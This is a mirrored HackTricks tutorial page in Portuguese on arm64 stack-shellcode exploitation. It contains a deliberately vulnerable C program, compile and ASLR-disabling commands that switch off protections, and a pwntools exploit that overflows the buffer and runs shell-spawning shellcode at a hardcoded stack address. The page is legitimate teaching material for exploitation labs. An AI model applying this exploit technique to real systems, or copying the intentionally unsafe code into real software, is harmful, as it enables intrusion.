mirror of
https://github.com/carlospolop/hacktricks
synced 2024-12-22 19:13:39 +00:00
88 lines
3 KiB
Markdown
88 lines
3 KiB
Markdown
|
# Shellcode de Pilha - arm64
|
||
|
|
||
|
<details>
|
||
|
|
||
|
<summary><strong>Aprenda hacking AWS do zero ao herói com</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||
|
|
||
|
Outras maneiras de apoiar o HackTricks:
|
||
|
|
||
|
* Se você deseja ver sua **empresa anunciada no HackTricks** ou **baixar o HackTricks em PDF** Verifique os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
|
||
|
* Adquira o [**swag oficial PEASS & HackTricks**](https://peass.creator-spring.com)
|
||
|
* Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||
|
* **Junte-se ao** 💬 [**grupo Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo telegram**](https://t.me/peass) ou **siga-nos** no **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
|
||
|
* **Compartilhe seus truques de hacking enviando PRs para os** [**HackTricks**](https://github.com/carlospolop/hacktricks) e [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repositórios do github.
|
||
|
|
||
|
</details>
|
||
|
|
||
|
Encontre uma introdução ao arm64 em:
|
||
|
|
||
|
{% content-ref url="../../../macos-hardening/macos-security-and-privilege-escalation/macos-apps-inspecting-debugging-and-fuzzing/arm64-basic-assembly.md" %}
|
||
|
[arm64-basic-assembly.md](../../../macos-hardening/macos-security-and-privilege-escalation/macos-apps-inspecting-debugging-and-fuzzing/arm64-basic-assembly.md)
|
||
|
{% endcontent-ref %}
|
||
|
|
||
|
## Código 
|
||
|
```c
|
||
|
#include <stdio.h>
|
||
|
#include <unistd.h>
|
||
|
|
||
|
void vulnerable_function() {
|
||
|
char buffer[64];
|
||
|
read(STDIN_FILENO, buffer, 256); // <-- bof vulnerability
|
||
|
}
|
||
|
|
||
|
int main() {
|
||
|
vulnerable_function();
|
||
|
return 0;
|
||
|
}
|
||
|
```
|
||
|
Compile sem pie, canary e nx:
|
||
|
|
||
|
{% code overflow="wrap" %}
|
||
|
```bash
|
||
|
clang -o bof bof.c -fno-stack-protector -Wno-format-security -no-pie -z execstack
|
||
|
```
|
||
|
{% endcode %}
|
||
|
|
||
|
## Sem ASLR & Sem canary - Estouro de pilha
|
||
|
|
||
|
Para desativar o ASLR, execute:
|
||
|
```bash
|
||
|
echo 0 | sudo tee /proc/sys/kernel/randomize_va_space
|
||
|
```
|
||
|
Para obter o [**deslocamento do bof, verifique este link**](../ret2win/ret2win-arm64.md#finding-the-offset).
|
||
|
|
||
|
Exploit:
|
||
|
```python
|
||
|
from pwn import *
|
||
|
|
||
|
# Load the binary
|
||
|
binary_name = './bof'
|
||
|
elf = context.binary = ELF(binary_name)
|
||
|
|
||
|
# Generate shellcode
|
||
|
shellcode = asm(shellcraft.sh())
|
||
|
|
||
|
# Start the process
|
||
|
p = process(binary_name)
|
||
|
|
||
|
# Offset to return address
|
||
|
offset = 72
|
||
|
|
||
|
# Address in the stack after the return address
|
||
|
ret_address = p64(0xfffffffff1a0)
|
||
|
|
||
|
# Craft the payload
|
||
|
payload = b'A' * offset + ret_address + shellcode
|
||
|
|
||
|
print("Payload length: "+ str(len(payload)))
|
||
|
|
||
|
# Send the payload
|
||
|
p.send(payload)
|
||
|
|
||
|
# Drop to an interactive session
|
||
|
p.interactive()
|
||
|
```
|
||
|
A única coisa "complicada" de encontrar aqui seria o endereço na pilha para chamar. No meu caso, gerei o exploit com o endereço encontrado usando o gdb, mas depois, ao explorá-lo, não funcionou (porque o endereço da pilha mudou um pouco).
|
||
|
|
||
|
Abri o **arquivo `core`** gerado (`gdb ./bog ./core`) e verifiquei o endereço real do início do shellcode.
|